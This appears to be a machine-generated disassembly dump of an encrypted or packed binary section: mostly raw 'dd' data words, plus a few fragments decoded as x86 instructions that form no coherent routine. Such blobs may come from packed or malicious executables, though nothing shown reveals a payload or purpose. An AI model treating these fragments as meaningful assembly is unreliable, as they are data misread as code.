dd 0EE3ACB28h, 0DF7528B5h, 0EC4514B1h, 0A4A1A6EFh, 933DDB16h
dd 359E25B7h, 0FD6F8699h, 8348AF45h, 0F6285B55h, 234AD370h
dd 0CE9D39B9h, 735D7E3Bh, 6F7BAC54h, 54DC948Eh, 32F9D74Dh
dd 1A849B3h, 332F3BABh, 0A283BD4Eh, 9AAAAA8Bh, 6804EED3h
dd 0A79FC776h, 7E6F8BAFh, 0C9D654D5h, 0A1131E31h, 734E2DABh
dd 0DA4DCFA3h, 31703F97h, 38359D01h, 3E8C68D2h, 4C90CF39h
dd 56EB2B41h, 5AE9B4EAh, 0D1DA256Ch, 0F7F5438Ch, 97C15018h
dd 0F1C6CF84h, 0E4A28B69h, 371E831Dh, 5EFB7095h, 3636850Fh
dd 0BD2F05DFh, 5C1C2493h, 439C3E16h, 3881A4A3h, 0BBC12D0Dh
dd 79730CA3h, 0B58D4478h, 2224B977h, 0C79D6057h, 0DD906CFEh
dd 3D3FD19Ah, 80E40A4Dh, 0CCED463Ch, 35A7103h, 742A679Fh
dd 0DBD73359h, 64B1E0E8h, 0AAF499B2h, 0B6C4F91h, 0AAA5E94Ah
dd 3E03A903h, 0AF284585h, 5D0AFDA9h, 178A065h, 4CA54209h
dd 7A24BE20h, 5D7E5F09h, 97E069C6h, 0AA2FB656h, 4F57FC97h
dd 29CA819Ah, 0E8D01C3h, 672F5A07h, 1B68523h, 0B7766249h
dd 0AFDCBC07h, 0C0711EC7h, 120FA17Fh, 74B3E9E6h, 7932C467h
dd 0E07C496Ah, 74928B60h, 0FFB519C5h, 661EE185h, 0A2903578h
dd 5F06F0A1h, 0C1C41953h, 0A24215E9h, 0E9B66D63h, 0A941AFEBh
dd 0A2AA7D79h, 0F1FA319h, 575FEA95h, 0FBC7B6C3h, 0DF3DFC44h
dd 0AEB5FF06h, 0A33C86EAh, 0A2A41BB7h, 6C7091AEh, 1A1B4E3Bh
dd 5807A2D7h, 0C8CC35E3h, 0FE686ABBh, 25BBF902h, 2FCD634Eh
dd 9C920F60h, 26EE8170h, 0E5DEC848h, 0CE84F9A2h, 5E6F1DF2h
dd 1DAF5F2Ah, 78C3008Ch, 0F5762C2h, 0B4B0ED1h, 0D5A2204h
dd 0D27119FDh, 8494EB0Ah
dd 8EC5724Ch, 2A542650h, 0AFFA82DCh, 2EF7E69Ah, 0E9F095BAh
dd 7380F30Eh, 0D69F2BCBh, 8E29C787h, 3EA611D8h, 0EE4C4D92h
dd 5F7FBF63h, 0B4E8AECDh, 7B01101Ah, 0EEAB55C4h, 870E905Fh
dd 0A7D4F114h, 0F46A2BDDh, 0DD95C14Fh, 220D3230h, 71E2763h
dd 2BD8002Fh, 0A9F62286h, 96DD6803h, 1A5B830Eh, 99C16B89h
dd 0EAACE333h, 0C6F110B4h, 0F43A577Eh, 0E0AB43ECh, 0D93FE843h
dd 0AEDB6C20h, 6787CAAh, 43445F08h, 0E048128Ah, 8248F759h
dd 540DEDB0h, 0DA8F1575h, 25A2BAACh, 0CE4D1958h, 0B94BC4BDh
dd 93BAA515h, 0F3567FC3h, 0CC8BC727h, 0CFB103D6h, 0DB168431h
dd 8FF19F2Ch, 850557ACh, 0DF43725Ch, 244C91E2h, 769F03C5h
dd 0DF1901DBh, 0E070E517h, 0D25FD939h, 4308EC33h, 0F098F6F8h
dd 0EF5E8638h, 72AB5BFFh, 849B144h, 0F924D249h, 8E9BFDEAh
dd 860FA426h, 63945691h, 7439335Fh, 45CC1E60h, 0F17320B5h
dd 6327C95h, 0F3395CC7h, 599032F4h, 0AE3768C6h, 1A4DAA4h
dd 79FC5A04h, 88B550B1h, 3E5E9585h, 0D530564Dh, 90CBC33Bh
dd 7ECBE546h, 91B3450Dh, 44F32A51h, 65FACCE9h, 0CBF94162h
dd 450CF744h, 73B0F2B5h, 1B461F05h, 325637A7h, 0B029E065h
dd 45662CCFh, 7D34B9C0h, 8F4633D9h, 597D644Bh, 59BE4D95h
dd 0CA4FB3AFh, 476B55C3h, 0DD93054Fh, 6F388504h, 45CE7630h
dd 0BA012245h, 90303AADh, 0AD5079BFh, 26D99563h, 3FD1315Bh
dd 0B826BD09h, 70F7B48Dh, 7E2C2211h, 0C1374FB2h, 0AD19AFA6h
dd 0C73BA1DFh, 869FA795h, 0A342E71Ch, 0F982E069h, 3B153CDBh
dd 0AC0AEC41h, 39B4D37Eh, 489A074Ch, 620BCCDBh, 8D502D13h
dd 36515C5h, 65F500Bh, 312DF2D0h, 0E108436Bh, 0D640BAF9h
dd 0E8091D93h, 0EE1A730Fh, 287165C9h, 8747B538h, 0B633108Dh
dd 0AA572052h, 33A5FE0Ah, 9825926h, 0F3E9DD53h, 0C55E0C3Ah
dd 0A06CB179h, 0A403A62Bh, 8DA8F016h, 0AA97D051h, 0B2CB2E8Fh
dd 0BD10E7EDh, 5EF02319h, 15114F25h, 613337E3h, 0D6029BDh
dd 9415107Eh, 2D018D4Dh, 9D467A31h, 20EB2167h, 0E18F8995h
dd 17526AD0h, 0B7891712h, 460D29DEh, 0FA179CDBh, 31894AF7h
dd 895F338h, 80503B77h, 33CF09BDh, 94B6772Ah, 0B83294B9h
dd 0E6EE0E2Ch, 7777CD71h, 0C29B8736h, 0BE4A9D4Ch, 0D3A53E95h
dd 3CA12A0Eh, 0ED7BD214h, 0AB641337h, 8FF3BA4Ah, 0AF1B09DFh
dd 0C9DD6B57h, 5784547Bh, 0C06D1365h, 12FA39D3h, 25B7EED6h
dd 0FE2DF83h, 9ADB5BBEh, 0C70BF3C6h, 0A782DD81h, 0FC6B3879h
dd 1221E1EFh, 0A4EADE8Ch, 54EEE4ACh, 4B75C7DCh, 35D5529Dh
dd 46866E87h, 7F56F3AEh, 0FB73947Bh, 8A6B6163h, 900A2C8h
dd 3EBBBFB3h, 104CA721h, 5002806h, 18D567E3h, 0C856A8D0h
dd 0E67EF782h, 0D266A933h, 8CBB3364h, 0E2C119F0h, 0CAC095ADh
dd 5AC4BA7Ch, 8EE84DE0h, 1650307Ch, 72837B9h, 5CACA6C8h
dd 9F5982B6h, 0E01DCE6h, 35F9A6D2h, 0BDB26C28h, 51FF9A64h
dd 91DA184Ah, 5A5D673Bh, 37E49023h, 5C431293h, 3D13ED65h
dd 0BD58272Dh, 9E5BC63Bh, 4E170DE7h, 0DDCECC23h, 0ACC7C147h
dd 3DD7AFA3h, 0FEB194D8h, 0B74227BCh, 43958CA7h, 68346969h
dd 0F7182298h, 0B92F1B85h, 8706AB93h, 5B46752Eh, 4F646E38h
dd 8E2B800Fh, 147F65A5h, 0B682EB1Ah, 0AC22CD0Fh, 8D712533h
dd 7506D0CDh, 7DFF1BEBh, 3288B409h, 85F6D0F1h, 9DAC3F76h
dd 5A5AF3CDh, 52E26244h, 0CA2689F1h, 0CFF1671Ah, 0CC731639h
dd 48418A38h, 0A92262D1h, 2DC816F3h, 0C37502BEh, 0BA9AB9B1h
dd 0E4B69B9Eh, 29ECA613h, 14429330h, 21FFA429h, 0C094600Ch
dd 0D5643967h, 0AFF6E5DFh, 4CB692A2h, 2752D47Dh, 2CF24755h
dd 0CEF27350h, 750FDF14h, 0B80C4336h, 0F0FFCE1Bh, 0BD942DE9h
dd 0F2B8351Eh, 0BAD5B016h, 0A6228792h, 0E41C9341h, 24BAFF98h
dd 8FC2E52Dh, 360AA35Ah, 0F35310F6h, 0C5AE566Bh, 45370E54h
dd 47BFC325h, 0DEB60F93h, 2289950Ah, 605E98FCh, 6C6A533Fh
dd 9B564369h, 0CE8B2C23h, 8BA9880h, 0CD8081BEh, 5D54B10Dh
dd 33F812ADh, 8263634Bh, 0E76FC0D2h, 0DB04957Bh, 8CB32AADh
dd 0D69A8846h, 0F04E9C31h, 0B36B8366h, 646C665Ch, 7FD36021h
dd 0CFC04AB0h, 71AE8F9Ah, 553F9B22h, 5ADA6188h, 8E903543h
dd 946767A9h, 0E4EE93BDh, 842A4ED9h, 9CAA47EBh, 7C545114h
dd 62AF24DDh, 68898191h, 7C9EA2FFh, 707AAC90h, 843F317h
dd 0DA50892Ah, 0C2C905Dh, 301835BAh, 37980D95h, 790E9FD3h
dd 0C5A356F4h, 62947697h, 16FFF981h, 8DFCFEFDh, 5F6CFD96h
dd 0B801EA71h, 0C5C9B6D6h, 0FE8A9A43h, 20DACF06h, 0B5F18906h
dd 167808C4h, 9AA04B12h, 9D8A3DDh, 0CA4EA987h, 5F0B3143h
dd 606CD21h, 52B55558h, 20616F6h, 0F9EF8513h, 0CFE26737h
dd 8EC9CFD5h, 7A010398h, 4A4F84CCh, 0B682A3DEh, 98833ECh
dd 51BB4CBh, 34059FF5h, 0D241B8D1h, 4DB9FC9Ch, 82AE5DCBh
dd 697FAB10h, 0D86E57E5h, 246BEDFh, 0D9AA8C9Eh, 88DF4412h
dd 53FEED6h, 690C880h, 0D0DF030Eh, 7572AC4Eh, 74864E5Eh
dd 0E93E5D0Dh, 38C784C3h, 0D7301E28h, 0FE6EACF5h, 0AE634C9h
dd 9709E029h, 0E7908095h, 0B12A8B6h, 0C32A641h, 95F3DB98h
dd 34342D2Ah, 8EB1FA6h, 43A11425h, 0FCAC301Ah, 0ADC355E0h
dd 0D34B4BE4h, 0A86548DBh, 0F2911774h, 0BF997469h, 43496243h
dd 0CA9B38D9h, 11075176h, 77D2C931h, 0E44C973Dh, 2DCDFC40h
dd 0E7F9D78Ah, 0E27707C3h, 0AA0CB4Fh, 813764BDh, 0C728ABA5h
dd 0FAEC700Bh, 0DC3A7FC8h, 0C03CF7A7h, 0EB3B4F3Fh, 6FB2D21Dh
dd 0D7E9BE56h, 38CB173Bh, 5AA45CA9h, 6C050F96h, 957E91B4h
dd 57DBA01Bh, 0C7994B33h, 77984F56h, 0AEC2975Bh, 0E2023C02h
dd 711FE78Dh, 0F948D2CDh, 92EF450Fh, 6B59591Ah, 0C85C95E4h
dd 0B1F7197Bh, 4FE115FDh, 0BC3A903h, 52EB5067h, 0F665472Dh
dd 51BDB872h, 9DA1C8D4h, 0B56FB837h, 835C9AEDh, 814216BEh
dd 725544B7h, 48B4737Bh, 5961CC52h, 5D288C1Ah, 54EC4BF8h
dd 14533F1h, 41E79220h, 0E7752FDAh, 6BFB4758h, 0C2476DE0h
dd 3FF4B865h, 0A7FC5F7Eh, 513BF524h, 28E965E8h, 0BDA1EB16h
dd 0E1CCD06Ah, 263C6590h, 3A45CECDh, 0AF200BC1h, 51CBE744h
dd 96A0676Dh, 1C4E239Eh, 0DD3875D5h, 47EC617Ah, 9FEC2C4Bh
dd 8CDC9E42h, 0B7D6B021h, 8AB4DC0Bh, 0AD45B013h, 6B9C81E7h
dd 0BE3B9AFCh, 12C1EB89h, 3AA97E32h, 503674B2h, 0A837FEC6h
dd 0ABF7C94Bh, 1B67DA17h, 0FB6401B2h, 0C688191Dh, 59FAC8AAh
dd 0DC22E949h, 2054816Ah, 3C3BAF17h, 1529DE03h, 25EA9091h
dd 3DE255F0h, 944F5C03h, 0AEF712F7h, 2304BF4Eh, 11754175h
dd 9B427F78h, 0EAD588BCh, 594B4654h, 8FF93A71h, 9B64B1E4h
dd 0E348B150h, 16270A01h, 243AC724h, 0C220DBC9h, 13059010h
dd 40C4CB2Ch, 796E8C9Fh, 880B807Eh, 0B9759500h, 7D3155FBh
dd 1525B4DDh, 6F49B961h, 0A990D65h, 6EC4BFFFh, 8E840EF7h
dd 0C41D3881h, 6780142Ah, 0C0FB0CA3h, 74DEF58Ch, 2A678435h
dd 3B1DB14Ah, 8C4E7C4h, 1654132Bh, 9F730716h, 0B92EC401h
dd 0F4A81D2Bh, 6144E271h, 0C5A21057h, 954BCC49h, 283B6FB6h
dd 0F2139549h, 0F0411F3Bh, 97D510F4h, 52170E53h, 8314EA95h
dd 0E16DB119h, 3647D246h, 973C54F7h, 33C8265Dh, 509BF8BAh
dd 91742134h, 3F26BD9Eh, 3CD1FB1Eh, 12544C0Fh, 48FADBC0h
dd 780F4AB8h, 0F64C087Ah
dd 0C807DB4Dh, 1044CDEAh, 0CD07A0F0h, 57AFE1C5h, 0CE464DC5h
dd 8D467480h, 0D9D5EAC8h, 933B254Ch, 56EAF95Bh, 442891A1h
dd 1701773Bh, 74310962h, 6A9E106Eh, 50780DC7h, 60BCEE85h
dd 0F102739Ch, 1DA38B29h, 0E24277CBh, 67965EA5h, 0BD9FED96h
dd 1FE63F28h, 0C22174ADh, 5DD9EA80h, 8F21B5A4h, 7FB80568h
dd 0EFC7B9C1h, 0DB63F52Fh, 7D467E00h, 991EAE0Bh, 0F4DF6487h
dd 90A38C8Fh, 9AF51987h, 7350D8B6h, 619372F2h, 75929EB8h
dd 55AD300Ah, 4C21EF39h, 0EA5A4B6h, 0F823593Fh, 416EC036h
dd 0A40A842h, 119444Ch, 0FF3B2C3Ah, 0CE654FF1h, 5334A199h
dd 0AFEBF6A5h, 2F7694EAh, 0B81A8F8Fh, 91FC9A14h, 0F83948AEh
dd 9F21B09Ch, 39A16DE3h, 2E524AD9h, 4832602Bh, 481B219Bh
dd 0BB2D695h, 16C5210Ch, 0ABE3C9D3h, 0BBAB712Ah, 3E398DAAh
dd 46F447EBh, 95BBA318h, 91068451h, 9DB3FFBh, 8CE243C2h
dd 698AF7D8h, 0EBC21611h, 8A8CC7AFh, 0D5944E7Dh, 0F3DC60FFh
dd 9B9F5E4h, 0BE09D6C6h, 0ABE670DBh, 0B143E517h, 0BFDC5C05h
dd 0DDA93BD5h, 79734B18h, 85AD56E6h, 9398D3DEh, 0CCEA7831h
dd 613C8998h, 2898D350h, 0C6EFA6C9h, 0B8178F76h, 5F7C787h
dd 0A61D5139h, 50DC7385h, 0DD28FF9Eh, 3CDF1DC5h, 0CF11D549h
dd 597FC00Fh, 0EAD1F2A1h, 7012ACA5h, 0CB6A1BC6h, 4BB1680Eh
dd 72B5977Dh, 0BBB02B7Ch, 0B0F03B07h, 22325583h, 39E2404h
dd 0C07B2D4Dh, 158A6214h, 1213E5F1h, 58BC7488h, 957DEEA1h
dd 3D2611A7h, 833D799h, 0D91F988h, 2AF8881Ch, 0B08AED15h
dd 0E514A738h, 44E545DFh, 9AF69F0Bh, 0FAE0A67Fh, 0CB684A32h
dd 97BBFCEBh, 8D243166h, 9CF872D4h, 0B37E7B7Ch, 90028B9Fh
dd 737E65AFh, 9B3F5896h, 8D8EE857h, 518C8F02h, 0FBA0CC87h
dd 8AC44C45h, 0B40A85E5h, 19D9015Eh, 3B04D529h, 5B4AE545h
dd 471CEFBDh, 3845AED7h, 64B234FEh, 0BAF33C2Fh, 27E1AD8Bh
dd 0EAB34A24h, 8ECCD5DFh, 138E851Bh, 0DD6F0149h, 7255942Dh
dd 2FC4A4CFh, 0BB0F36D9h, 68F40BB7h, 2B5DFDADh, 0BE5AA196h
dd 0FAE1F401h, 36A0B272h, 3D16EFF8h, 846190FCh, 0FC10C76Bh
dd 877126E0h, 0D06581Ch, 5AAAAB98h, 351AB522h, 0CD85A134h
dd 6C4F14DDh, 0F3BE6AC4h, 9AF0111Ah, 0EB0ED090h, 0BFF0987Eh
dd 8E97E5B3h, 6A249700h, 0C7A2D0Eh, 293A03B4h, 0E037F02Fh
dd 576112FCh, 51F0D88Fh, 0E28724EDh, 0D105FA2h, 2E603F4Bh
dd 0C429A47Ch, 0FB655F1Eh, 839603A0h, 0FB36D726h, 71ABFADAh
dd 8AF6DE59h, 0C0A96F81h, 76D75949h, 0C61B9C68h, 0A4647BBBh
dd 2E7E91F0h, 7035B6E9h, 9A4BC787h, 1FC03FD9h, 8CDD3CEEh
dd 403D2C1Eh, 8A8B31CEh, 0D6A65BA5h, 5029288Ch, 8D1959DAh
dd 0D3FEF52Fh, 1ECFAA9Ah, 54A860CAh, 0D225C7C0h, 0A468B0BCh
dd 30AAB7D9h, 1B476A3Dh, 0BD71143Eh, 0A8C472B8h, 2589C0FAh
dd 930DBF3Ch, 0AAB6D7CCh, 66D350F1h, 0ECB9283Eh, 91992EFDh
dd 0E56DB6E3h, 5CA73CD9h, 72A42C46h, 0EBAAB257h, 0CC890A7h
dd 4FC47877h, 6A9C2F1h, 28D2FFE9h, 3277DD1Eh, 0C63C14CEh
dd 0B64F381Bh, 0F6C5CADDh, 0DF0A5F4Fh, 7C3CE155h, 72595856h
dd 241AD130h
; ---------------------------------------------------------------------------
loc_425440: ; CODE XREF: .data:00418C51�j
in eax, dx
hlt
; ---------------------------------------------------------------------------
sub eax, 6488D8DCh
pop edi
or dh, [esi]
sbb al, 2Ah
mov [ecx+1Dh], eax
jo short loc_4254A0
fistp word ptr [ebx]
push ecx
retn
; ---------------------------------------------------------------------------
db 11h, 3Fh, 44h
dd 0E8E7F3C6h, 7E879CF1h, 17DC8D8Dh, 3C44C91Fh, 0D6E88E54h
dd 90C7595Ch, 87664AE6h, 3295B9DFh, 28DEB6D3h, 93079CD9h
dd 5BB0D3F4h, 6E26F5F7h, 0A675D1E1h, 5D02BA08h, 6DA130A8h
dd 4CA6C3A7h, 121B80C9h, 0C73A73C2h
; ---------------------------------------------------------------------------
loc_4254A0: ; CODE XREF: .pdata:0042544F�j
icebp
inc edx
add ebp, [ebx]
xchg eax, ebx
pop esp
dec ebp
cmc
jmp far ptr 0A277h:0E238CBF9h
; ---------------------------------------------------------------------------
db 21h
dd 14208E49h, 0B717DD16h, 0A608F638h, 0CE18FED4h, 0EEB8D35Ch
dd 46AEEA2Eh, 523C0807h, 0B1ED48ACh, 0A6ED0476h, 57699365h
dd 79D42F7Ah, 7950F121h, 6CF01316h, 0AC561DAFh, 2ACED56Eh
dd 116A3DF5h, 0F77D37DEh, 0ECDC8D61h, 6DFACD7Bh, 621EAFFEh
dd 0EFA4222Fh, 0EE648E96h, 0CFA03761h, 48F0BF98h, 175A1285h
dd 4DB0B4F7h, 0E9912977h, 22643C20h, 5B148BBCh, 81E227DEh
dd 79EB6EF6h, 4E7B03F5h, 1D312989h, 0EB3B9F95h, 4F6C1723h
dd 99F00C73h, 0B9049FDBh, 0D461ECF2h, 0EE723B21h, 0A54E323Eh
dd 11E0CABBh, 74152C07h, 69F0DCFh, 24FB7BAh, 67D4ABEh
dd 19E835E8h, 0E9572693h, 0E2FDB869h, 97ECDD9Fh, 0DC3B166h
dd 9892260Ah
; ---------------------------------------------------------------------------
loc_42557C: ; CODE XREF: .data:00418D8D�j
mov bl, 0Ch
pushf
setalc
jnb short loc_4255A5
dec edx
mov eax, ds:0C2105A6Ch
into
; ---------------------------------------------------------------------------
db 8Fh, 96h, 38h
dd 74E8D0ABh, 136CDEAh, 6DAD70D6h, 14E49453h, 0F61E11A9h
dd 83A7151h
; ---------------------------------------------------------------------------
pop esi
loc_4255A5: ; CODE XREF: .pdata:00425580�j
jno short loc_425608
push ebp
bound ecx, [eax+552AF095h]
int 3 ; Trap to Debugger
repne rcl ecx, 0D9h
jnp short loc_4255F3
mov eax, ds:0ECD2189Eh
add bh, [ebp-19h]
xor ebp, [eax+eax*2-52h]
lahf
aad 7Ch
sti
into
mov cl, 53h
jge short near ptr loc_4255CA+1
loc_4255CA: ; CODE XREF: .pdata:004255C8�j
les esp, [ebp+3B63D42Eh]
pushf
adc al, 0A3h
mov esi, 0BE06E648h
pop ss
adc [ebx+668905BDh], ebx
or dl, [edx]
mov ds:77042DDEh, eax
test [edx+edx*4-4895D83Ch], ecx ; CODE XREF: .pdata:00425612�j
mov ebx, 2A6B5AACh ; CODE XREF: .pdata:0042561A�j
loc_4255F3: ; CODE XREF: .pdata:004255B3�j
inc ebx
locret_4255F4: ; CODE XREF: .pdata:00425610�j
retn
; ---------------------------------------------------------------------------
scasd
mov word ptr [ebp+56h], fs
not byte ptr [esi-7EDE9EEBh]
add ah, [ecx-2CAA4598h]
dec eax
sub al, 34h
loc_425608: ; CODE XREF: .pdata:loc_4255A5�j
db 66h
add bl, ch
sbb al, 89h
fidivr word ptr [ebx+54h]
loop locret_4255F4
loop near ptr loc_4255E7+2
in eax, 76h
out 1Eh, eax
dec ebp
pop ss
jnp short near ptr loc_4255EE+4
db 64h
call near ptr 774DDB0h
fstp9 st(1)
xor eax, 2DD37651h
enter 0FFFFE755h, 0FCh
test al, 0C5h
dec edx
bound eax, [ebx-668B694Eh]
jmp near ptr 5DD706FFh
; ---------------------------------------------------------------------------
db 0FBh
dd 0A920D8EEh, 6EC50DEFh, 58F04997h, 702A517Bh, 0F56B614Ah
dd 0BC402498h, 2A8BC66h, 0EADE7C65h, 2AFAD1AFh, 50D81317h
dd 0A8502E5Ah, 926C9AC1h, 0DAD17563h, 0D1641373h, 0E659C95Ch
dd 65E3087Ah, 0C0005AD8h, 221B5AD3h, 0B61179DCh, 1D5152C2h
dd 0FF4BCD51h, 584D765Dh, 0BDEE936Ah, 0BDF31194h, 5291E3F2h
dd 6DBF999Eh, 0D2C5F3F2h, 677A540Ah, 0E8B3CA58h, 0B7EECB1Bh
dd 0FEC9760Fh, 0D122BB6Dh, 8472B80Ch, 0C8D05FBDh, 2976653Bh
dd 3C631A64h, 69BCE9ABh, 20C945E1h, 0A0D8122Fh, 0AF685E45h
dd 9EC0EC13h, 6012F860h, 38FCAACDh, 69E797CEh, 0BDBA3A95h
dd 0E429AFF3h, 0D9B6FB1Dh, 8511D704h, 7197A59Fh, 31F5EC7Bh
dd 96598EE5h, 0C93889E1h, 9B886652h, 0C1D2A072h, 0C13B32E2h
dd 0BF76187Eh, 64EE627Dh, 79889076h, 78FCFC25h, 47013251h
dd 6F114535h, 80DF8506h, 29B3EB9Eh, 5B285752h, 6694C758h
dd 318F3257h, 83B03232h, 4FD30C0Eh, 0D88C4FD6h, 89469046h
dd 0C35D112Eh, 0E06D1617h, 35A4E0FBh, 85C374B3h, 29F88A0Bh
dd 596D4A6Eh, 3D4FBC36h, 67288CD2h, 0C538A237h, 0D1F4393Ah
dd 0DE732F75h, 4E399DB9h, 0ED98955Fh, 17D8F498h, 0AE67F26Dh
dd 974952C5h, 0DF38FF8h, 0DBB47A76h, 58778459h, 5AC2610Eh
dd 5E994E86h, 3FAD256Eh, 0AE031B2h, 385683E6h, 20EE4CD6h
dd 0E870DAB8h, 3F380CB8h, 8ED46FB1h, 0DC666C2h, 7CAD9B96h
dd 0B1AA9127h, 6CC14D1Ch, 204A5664h, 0CAF572C4h, 1286271Ah
dd 4CF3D9F1h, 0AC2EABBDh, 418FA794h, 0B1F7DEEEh, 118496B0h
dd 188726B7h, 0EDFA930Fh, 3D04B61Ch, 717E3ED3h, 0CE404F17h
dd 0DD74AC31h, 0A97F01DEh, 7F6A78C3h, 0D92D261Eh, 1BC9FC54h
dd 66C7848Eh, 90057797h, 941ECB1h, 4A09C0ADh, 690E6F89h
dd 70DC0096h, 0A1442ABFh, 0C9C6C09Eh, 3C7FF32Ch, 0DC23D572h
dd 0E00A2AC0h, 706A712Ch, 0D4E50980h, 0D33237C7h, 8D0EC8DBh
dd 6D8F984Ah, 2636811Eh, 952D9A53h, 962F7D25h, 0F4C2CBEBh
dd 6E64EACEh, 745C3E4Bh, 0BF15C7E2h, 377AE16Dh, 540B10AEh
dd 0EEEFB0FAh, 0D32B9859h, 0E0CC2D93h, 1CAF39D0h, 0ADC5AAD5h
dd 0E8B9A2E2h, 0D3BF7F80h, 727C17B4h, 40DF886Eh, 0DBC228CEh
dd 0BA8CF756h, 0F2186Ah, 513765F8h, 9314A305h, 25472F81h
dd 2B14D523h, 2BF5AA83h, 0D197B9C5h, 7067DEC8h, 0E6A0255Ah
dd 9885618Dh, 29B1D2A8h, 0E1E5DCBBh, 9783C309h, 0CD9DD19Dh
dd 99A2453Ch, 0A6651C81h, 116DC7F0h, 0A3221B0Ch, 5AFAFDBBh
dd 5AC69BB5h, 0AEC6C487h, 452520B8h, 0CEDDE2CAh, 61597F45h
dd 1424CBB6h, 2443AD00h, 0A3FFF36Eh, 26319C5Eh, 0AF49C2B3h
dd 6F6BA968h, 5D5BA354h, 918383DDh, 0CB497FF2h, 0AEDA4A49h
dd 0D13BE84Ch, 9454456Fh, 77CB1F6Ah, 0DAE24D11h, 0C4E1255Ch
dd 38A5C03Fh, 8ECF23E3h, 5B3FC75Bh, 725BB3D8h, 3A1A6631h
dd 822EAD07h, 2EEA03D7h, 0DCA401FAh, 9B7C8F02h, 0A6F1B348h
dd 0D64495B3h, 644F20F0h, 0EFA542D6h, 0C255B65Ch, 508BC34Dh
dd 92083ECEh, 7BF960A0h, 0CD01F9E5h, 0D6BEF37Ch, 16A6E7BEh
dd 7FDA2F2h, 8E4DCB5Ah, 0F13B9071h, 3FB2A1ABh, 0C296560Dh
dd 9A960DC2h, 0A7CE4627h, 9281C72Dh, 45EC34FDh, 65F0C8B0h
dd 0F56445FBh, 16D9D979h, 5807C9A2h, 2C097CBBh, 4A725Dh
dd 0C666B3B9h, 27EDD69Dh, 2A445B4Ah, 3846CA6Ah, 0AC7F91CCh
dd 4A060C24h, 3A35BEC8h, 0EC363CEBh, 401F19C3h, 0E9697F5Ah
dd 36BC0F2Ch, 0A1B43C7Ah, 761227E1h, 0CD19A1D5h, 5FCC4AC8h
dd 0BD13C3E3h, 4E878D4h, 0EFB29787h, 97FB102Eh, 35E6382Ch
dd 4661229Ah, 1348211Fh, 1AF30DBFh, 905F093Ah, 0A1506EA9h
dd 76F9094Ah, 0D393865Eh, 74F40B2Ch, 2866CFB2h, 59B12D09h
dd 0AB22E724h, 2D171321h, 2049256Ch, 0BC7ED9E5h, 5D2FFFCh
dd 4AC55B32h, 2A1A91D5h, 31D8B029h, 9BC42570h, 5BF8CB2h
dd 2D78972Bh, 470E92BBh, 13BFC945h, 0A3E338FEh, 4A4A6E86h
dd 0FC8B740Eh, 9939EA52h, 440C1BCEh, 5E60E3FFh, 7C8D6726h
dd 89C6C484h, 52952922h, 5B5CB173h, 8278373h, 493972C4h
dd 14F7D3F8h, 3C6C234Bh, 3A2516C9h, 9335BCC5h, 1D75B9CEh
dd 0C7FCADE5h, 9B9B1E28h, 4A1B9193h, 3172313Ch, 69CF3794h
dd 0A94C6396h, 0E5DEE9DBh, 3B550497h, 126AC29h, 295F8B9Ch
dd 0C5E40856h, 7E0F9839h, 0BF463A7Fh, 32251F62h, 0DF1D31D1h
dd 0CEACEB78h, 0FDDF5274h, 35B8FCDAh, 0B6393034h, 0BDDA0620h
dd 0DA3C4A80h, 0BA1DC418h, 0FA8A4E2Bh, 3BBBC9F4h, 0E7589244h
dd 9AF18EAh, 0D247211Fh, 28A56A7Ah, 0DAD8BE8Eh, 3CFFC306h
dd 0A800AF7Fh, 0FBB2D7E5h, 2A217Bh, 0B5BD7652h, 41AE1FC1h
dd 650ADB19h, 5F0610D6h, 0B5EF25D3h, 19606108h, 50A85173h
dd 77A7B117h, 0CE82AF26h, 0B32BB63h, 3CB6D6h, 36680552h
dd 8EB40068h, 0A1CA8313h, 0BE7ED988h, 0A5E60806h, 0C48BABE8h
dd 20781858h, 0C1027F25h, 0C5981E3h, 61B8EA39h, 0C89AB858h
dd 3AEB62BAh, 3D3D2330h, 40D6A289h, 0E0204AE5h, 5A989BBAh
dd 6215AA80h, 249EF712h, 23EB7234h, 49A54B6Ch, 83542F06h
dd 0E0CD5FDAh, 0C20EC27Fh, 0E0F178DAh, 2353A666h, 6512FA4Fh
dd 8B0A92FBh, 0A04115EDh, 0B323B80Dh, 56AE4E06h, 0A77223C1h
dd 0EFB1E2BEh, 423DC258h, 334B6407h, 9C5F4B71h, 2B6AEBC1h
dd 0E90F8474h, 0C07A1A34h, 0FCF99DAh, 398E1154h, 47C581FBh
dd 4C9A447Ch, 0D0416CD8h, 420C5B04h, 0DB90D7B0h, 0F0C2F939h
dd 86B0B3D5h, 8D784284h, 0CC116F84h, 24579D28h, 89DD30E4h
dd 65458137h, 0A80D14A6h, 4960D5A5h, 0A76BBCBCh, 346CCE4Ch
dd 9C839EA5h, 52B183DAh, 780F1F9Eh, 6A8E31F0h, 42AD4E73h
dd 0BEA3E98Fh, 75411F0Fh, 2CF66742h, 91CB8382h, 0D085699Bh
dd 0DCB7A118h, 55ED8403h, 0DD940DEEh, 0C016C7FCh, 513E1073h
dd 0C8EED258h, 0B01B70C9h, 8F46C0D6h, 38F0781Eh, 0C5281ECEh
dd 0C1649426h, 0D300DAC6h, 0D2FCC80Bh, 0FCA24946h, 8A3A95Fh
dd 0EF2323A9h, 0F30E9C79h, 0C4FDF70h, 0B50DFBB6h, 23E6FFF8h
dd 911DC93Ah, 791AC98Dh, 543B1C2Ah, 0FA231449h, 4618079Bh
dd 0EDDDAB74h, 8A9A444Ah, 39A7AD7Dh, 0EFE75EC6h, 0FD528E4Ah
dd 6D3FD340h, 0A7DF872Dh, 0D9E7FDDAh, 8CF9353Fh, 486C0DDEh
dd 0BAD53434h, 0FF138014h, 388FF221h, 0E6A9837Eh, 1BF6393h
dd 35EAEE9Dh, 8EE1AC4Eh, 0B0AAF06Ch, 4FC32318h, 80B01FA3h
dd 0A7081408h, 0ED084DF8h, 0A1F59323h, 0C36D9520h, 0F59A00D4h
dd 27BD9366h, 22E9A846h, 13A7361Ch, 1E5D1DA8h, 58C68763h
dd 0F3490D2Eh, 3E02A876h, 0B49A44DEh, 3B059584h, 0D8B69FB8h
dd 0E362907Ah, 7F1BE740h, 0BC10BC3Bh, 83A204B2h, 8FC0390Fh
dd 0D0192127h, 2537E3F3h, 8808AD30h, 0CC57DFF1h, 0CEFC2EFDh
dd 57886D83h, 0F1F5AE20h, 8D906ED9h, 56E7CC76h, 1103D52Ah
dd 9D659B6Fh, 3AFD34DBh, 6DF8DA69h, 0C794CABBh, 9A05030h
dd 0D77A41EDh, 8A9E4506h, 485E56E3h, 3D5D8228h, 0CEE85F8Fh
dd 7FB143A7h, 0D2EC6B50h, 0D2B909C6h, 4A9A3BA8h, 2296903Ch
